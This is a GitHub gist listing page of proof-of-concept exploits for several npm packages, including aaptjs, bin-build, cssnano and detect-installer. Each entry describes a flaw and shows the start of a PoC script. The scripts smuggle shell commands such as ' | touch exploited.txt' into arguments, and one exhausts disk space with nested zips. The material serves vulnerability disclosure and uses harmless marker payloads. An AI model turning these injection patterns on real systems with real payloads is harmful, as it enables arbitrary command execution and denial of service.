Miguel Coimbra mcoimbra
mcoimbra
/ 0x_poc.js
Last active
October 29, 2023 12:21
Package 0x: Affected versions of this package are vulnerable to code injection. Calling zeroEks(args) will execute a local file local-touch.sh (via lib/v8-log-to-ticks.js#74) which may run arbitrary commands. This requires the presence of additional files which can be empty.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const zeroEks = require('0x'); | |
| var args = { | |
| pathToNodeBinary: "./local-touch.sh", | |
| visualizeOnly: "./", | |
| v: true | |
| } | |
| /* | |
| * For this to work, the following files with specific names must be present |
mcoimbra
/ aaptjs_poc.js
Last active
October 26, 2023 12:09
Package aaptjs: The aaptjs module's 'add' function can add files to an existing .zip file. It is possible to call it once to create a .zip file and then iteratively create a new .zip from the previous one, eventually filling the file system storage space.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('aaptjs'); | |
| /* | |
| * Creates many zip files. After PREV_ZIP_SZ zip files created, | |
| * it starts adding the last PREV_ZIP_SZ zip files to the new one | |
| * rather than just hte previous one. |
mcoimbra
/ aaptjs_poc-zip-cmd-inject.js
Last active
October 29, 2023 12:18
Package aaptjs: The aaptjs module's 'add' function can be exploited through its first argument. It is a string through which a command can be injected by piping after the zip file value. Example: 'test0.zip | touch exploited.txt'.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('aaptjs'); | |
| /* | |
| * Function 'aaptjs.add' starts a child process with a method signature | |
| * that takes a single string command containing both the binary and arguments, | |
| * thus being vulnerable to this pipe usage example. | |
| * A local 'exploited.txt' file will be created. | |
| */ |
mcoimbra
/ babel-plugin-module-rewrite-0.2.0_poc.js
Last active
October 29, 2023 12:16
Package babel-plugin-module-rewrite: The babel-plugin-module-rewrite package enables command injection into the eval() function by appropriately setting the function parameters as shown in this example.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('babel-plugin-module-rewrite'); | |
| const _ref2 = { | |
| types: { | |
| isIdentifier: function() { return true; }, | |
| isMemberExpression: function() {} | |
| } |
mcoimbra
/ bin-build-3.0.0_poc.js
Last active
October 29, 2023 12:15
Package bin-build: The src/index.js file in package bin-build allows for command injection via the arguments passed to execa.shell() (see line #8 of src/index.js).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('bin-build'); | |
| // A local 'exploited.txt' file will be created. | |
| pkg.directory("./", ["touch exploited.txt"]); | |
| /* | |
| * Relevant code from src/index.js |
mcoimbra
/ circle-github-bot_poc.js
Last active
November 29, 2023 19:01
Package circle-github-bot: The call to function curl (#28) in src/dist/index.js does not sanitize the parameters passed to exec(), enabling the injection of something like " | touch exploit.txt".
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('circle-github-bot'); | |
| const i = new pkg(); | |
| i.env = {}; | |
| // This will create a local 'exploited.txt' file. | |
| i.curl('', ' | touch exploited.txt', ''); |
mcoimbra
/ cssnano_poc.js
Last active
November 9, 2023 16:18
Package cssnano: Allows a custom function to be passed into its internals (#56 in src/index.js) which will then execute it. In this example an 'exploited.txt' file is created.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('cssnano'); | |
| const options = { | |
| preset: function() { | |
| const fs = require('node:fs'); | |
| let fd = fs.openSync('exploited.txt', 'a'); | |
| fs.closeSync(fd); |
mcoimbra
/ daemonize-process_poc.js
Last active
October 29, 2023 12:22
Package daemonize-process: Kills the current process and launches a copy of its semantics as a background process. The process object attributes process.execPath and process.argv may be changed beforehand to launch an arbitrary script. This could be used for example to launch command 'yes' piped into a file, as an example.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const daemonizeProcess = require('daemonize-process'); | |
| process.execPath = 'touch'; | |
| process.argv = ['touch', 'exploited.txt', '']; | |
| /* | |
| * This will launch a child process that is supposed to be the same binary of the current process. | |
| * By hijacking process.execPath and process.argv, we inject a different executable. |
mcoimbra
/ dockermachine-cli-js_poc.js
Last active
October 29, 2023 12:09
Package dockermachine-cli-js: A DockerMachine instance can be created through a child process started by the package. Possible to inject a command (e.g. ' | touch exploit.txt') through the parameter of its command method.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('dockermachine-cli-js'); | |
| const d = new pkg.DockerMachine(); | |
| const commandStr = ' | touch exploited.txt'; | |
| // An 'exploited.txt' file will be created locally. | |
| d.command(commandStr); |
mcoimbra
/ detect-installer-1.0.2_poc.js
Last active
October 29, 2023 12:23
Package detect-installer: Module detect-installer has the purpose of detecting an appropriate package manager to use but it enables command injection into child_process' execSync.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('detect-installer'); | |
| // This creates a local 'exploited.txt' file. | |
| pkg.hasPackageCommand('touch exploited.txt | '); |
OlderNewer